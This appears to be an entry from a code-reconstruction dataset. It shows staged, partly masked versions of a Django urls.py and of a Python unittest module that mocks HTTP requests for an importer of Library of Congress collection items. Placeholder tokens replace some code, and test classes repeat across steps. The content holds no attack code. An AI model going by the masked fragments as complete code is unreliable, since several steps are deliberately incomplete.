"step-3": "<mask token>\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'login_test_app.urls')), path('accounts/', include('allauth.urls')),\n path('__debug__/', include(debug_toolbar.urls))]\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-4": "from django.contrib import admin\nfrom django.contrib.staticfiles.urls import static\nfrom django.urls import path, include\nfrom . import settings_common, settings_dev\nimport debug_toolbar\nurlpatterns = [path('admin/', admin.site.urls), path('', include(\n 'login_test_app.urls')), path('accounts/', include('allauth.urls')),\n path('__debug__/', include(debug_toolbar.urls))]\nurlpatterns += static(settings_common.MEDIA_URL, document_root=settings_dev\n .MEDIA_ROOT)\n",
"step-5": "from django.contrib import admin\nfrom django.contrib.staticfiles.urls import static # 本Ch11.1\nfrom django.urls import path, include\n\nfrom . import settings_common, settings_dev # 本Ch11.1\nimport debug_toolbar\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include('login_test_app.urls')),\n path('accounts/', include('allauth.urls')), # allauthデフォルトURL:本P218\n path('__debug__/', include(debug_toolbar.urls)),\n\n]\n\n# 開発サーバーでMEDIA_ROOT,MEDIA_URLを渡したdjango.contrib.staticfiles.urls.static関数から\n# 返されたルーティングを追加する\nurlpatterns +=static(settings_common.MEDIA_URL, document_root=settings_dev.MEDIA_ROOT)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class GetCollectionItemidsTest(TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = 'mss37820001'
@patch('importer.tasks.requests.get')
def test_get_collection_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls available in given item id
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [
'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'
])
@patch('importer.tasks.requests.get')
def test_get_collection_no_asset_urls(self, mock_get):
"""
        Testing when no collection item asset URLs are available for the given item id
"""
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch('importer.tasks.requests.get')
def test_download_write_asset_item(self, mock_get):
"""
        Testing that an image is downloaded and written to disk without error
"""
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, True)
@patch('importer.tasks.requests.get')
def test_download_write_asset_item_error(self, mock_get):
"""
        Testing image download when an exception is raised
"""
mock_resp = MockResponse({}, 200, content=Exception('boom'))
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given collection URL
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes_no_db_entry(self,
mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given collection URL with no DB entry in CollectionTaskDetails
"""
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given item id
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given item id with no DB entry in CollectionTaskDetails
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GETRequestDataTest(TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@patch('importer.tasks.requests.get')
def test_get_request_not_success(self, mock_get):
"""get data on not success"""
mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 400)
self.assertEqual(response, {})
<|reserved_special_token_0|>
class GetCollectionPagesTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_pages(self, mock_get):
"""
get collection pages successfully with pages info
"""
mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 10)
@patch('importer.tasks.requests.get')
def test_get_collection_sucess_no_pages(self, mock_get):
"""
get collection pages successfully with no pages info
"""
mock_resp_instance = MockResponse({}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 0)
class GetCollectionItemidsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids(self, mock_get):
"""
        Testing the number of collection item ids available for the given collection URL
"""
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, ['mss37820001'])
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids_no_ids(self, mock_get):
"""
        Testing when no collection item ids are available for the collection URL
"""
mock_page1_result = MockResponse({}, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, [])
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = 'mss37820001'
@patch('importer.tasks.requests.get')
def test_get_collection_asset_urls(self, mock_get):
"""
        Testing the number of collection item asset URLs available for the given item id
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [
'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'
])
@patch('importer.tasks.requests.get')
def test_get_collection_no_asset_urls(self, mock_get):
"""
        Testing when no collection item asset URLs are available for the given item id
"""
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch('importer.tasks.requests.get')
def test_download_write_asset_item(self, mock_get):
"""
        Testing that an image is downloaded and written to disk without error
"""
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, True)
@patch('importer.tasks.requests.get')
def test_download_write_asset_item_error(self, mock_get):
"""
        Testing image download when an exception is raised
"""
mock_resp = MockResponse({}, 200, content=Exception('boom'))
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given collection URL
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes_no_db_entry(self,
mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given collection URL with no DB entry in CollectionTaskDetails
"""
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given item id
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given item id with no DB entry in CollectionTaskDetails
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GetItemIdFromItemURLTest(TestCase):
def test_get_item_id_from_item_url_with_slash(self):
"""
        Testing get item id from an item URL that ends with /
"""
url = 'https://www.loc.gov/item/mss859430021/'
resp = get_item_id_from_item_url(url)
self.assertEqual(resp, 'mss859430021')
def test_get_item_id_from_item_url_without_slash(self):
"""
        Testing get item id from an item URL that ends without /
"""
url = 'https://www.loc.gov/item/mss859430021'
resp = get_item_id_from_item_url(url)
self.assertEqual(resp, 'mss859430021')
class GETRequestDataTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
:return:
"""
self.url = 'https://www.loc.gov/item/mss859430021?fo=json'
@patch('importer.tasks.requests.get')
def test_get_request_success_json_data(self, mock_get):
"""get data on success json data"""
mock_resp_instance = MockResponse({'msg': 'success'}, 200)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance.json())
@patch('importer.tasks.requests.get')
def test_get_request_not_success(self, mock_get):
"""get data on not success"""
mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 400)
self.assertEqual(response, {})
@patch('importer.tasks.requests.get')
def test_get_request_normal_response(self, mock_get):
"""if json false return repose object with content"""
mock_resp_instance = MockResponse({'msg': 'success'}, 200, content=
'abc')
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url, json_resp=False)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance)
class GetCollectionPagesTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_pages(self, mock_get):
"""
get collection pages successfully with pages info
"""
mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 10)
@patch('importer.tasks.requests.get')
def test_get_collection_sucess_no_pages(self, mock_get):
"""
get collection pages successfully with no pages info
"""
mock_resp_instance = MockResponse({}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 0)
class GetCollectionItemidsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids(self, mock_get):
"""
        Testing the number of collection item ids available for the given collection URL
"""
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, ['mss37820001'])
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids_no_ids(self, mock_get):
"""
        Testing when no collection item ids are available for the collection URL
"""
mock_page1_result = MockResponse({}, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, [])
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = 'mss37820001'
@patch('importer.tasks.requests.get')
def test_get_collection_asset_urls(self, mock_get):
"""
        Testing the number of collection item asset URLs available for the given item id
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [
'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'
])
@patch('importer.tasks.requests.get')
def test_get_collection_no_asset_urls(self, mock_get):
"""
        Testing when no collection item asset URLs are available for the given item id
"""
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch('importer.tasks.requests.get')
def test_download_write_asset_item(self, mock_get):
"""
        Testing that an image is downloaded and written to disk without error
"""
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, True)
@patch('importer.tasks.requests.get')
def test_download_write_asset_item_error(self, mock_get):
"""
        Testing image download when an exception is raised
"""
mock_resp = MockResponse({}, 200, content=Exception('boom'))
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given collection URL
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes_no_db_entry(self,
mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given collection URL with no DB entry in CollectionTaskDetails
"""
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given item id
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
        Testing the number of collection item asset URLs available for the given item id with no DB entry in CollectionTaskDetails
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MockResponse:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def iter_content(self, chunk_size=None):
return io.BytesIO(self.content.encode())
class GetItemIdFromItemURLTest(TestCase):
def test_get_item_id_from_item_url_with_slash(self):
"""
        Testing get item id from an item url that ends with /
"""
url = 'https://www.loc.gov/item/mss859430021/'
resp = get_item_id_from_item_url(url)
self.assertEqual(resp, 'mss859430021')
def test_get_item_id_from_item_url_without_slash(self):
"""
        Testing get item id from an item url that does not end with /
"""
url = 'https://www.loc.gov/item/mss859430021'
resp = get_item_id_from_item_url(url)
self.assertEqual(resp, 'mss859430021')
class GETRequestDataTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
:return:
"""
self.url = 'https://www.loc.gov/item/mss859430021?fo=json'
@patch('importer.tasks.requests.get')
def test_get_request_success_json_data(self, mock_get):
"""get data on success json data"""
mock_resp_instance = MockResponse({'msg': 'success'}, 200)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance.json())
@patch('importer.tasks.requests.get')
def test_get_request_not_success(self, mock_get):
"""get data on not success"""
mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 400)
self.assertEqual(response, {})
@patch('importer.tasks.requests.get')
def test_get_request_normal_response(self, mock_get):
"""if json false return repose object with content"""
mock_resp_instance = MockResponse({'msg': 'success'}, 200, content=
'abc')
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url, json_resp=False)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance)
class GetCollectionPagesTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_pages(self, mock_get):
"""
get collection pages successfully with pages info
"""
mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 10)
@patch('importer.tasks.requests.get')
def test_get_collection_sucess_no_pages(self, mock_get):
"""
get collection pages successfully with no pages info
"""
mock_resp_instance = MockResponse({}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 0)
class GetCollectionItemidsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids(self, mock_get):
"""
        Testing the number of collection item ids available in the given collection url
"""
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, ['mss37820001'])
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids_no_ids(self, mock_get):
"""
        Testing when no collection item ids are available in the given collection url
"""
mock_page1_result = MockResponse({}, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, [])
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = 'mss37820001'
@patch('importer.tasks.requests.get')
def test_get_collection_asset_urls(self, mock_get):
"""
        Testing the number of collection item asset urls available in the given item id
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [
'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'
])
@patch('importer.tasks.requests.get')
def test_get_collection_no_asset_urls(self, mock_get):
"""
        Testing when no collection item asset urls are available for the given item id
"""
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch('importer.tasks.requests.get')
def test_download_write_asset_item(self, mock_get):
"""
        Testing downloading an image and writing it to disk without error
"""
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
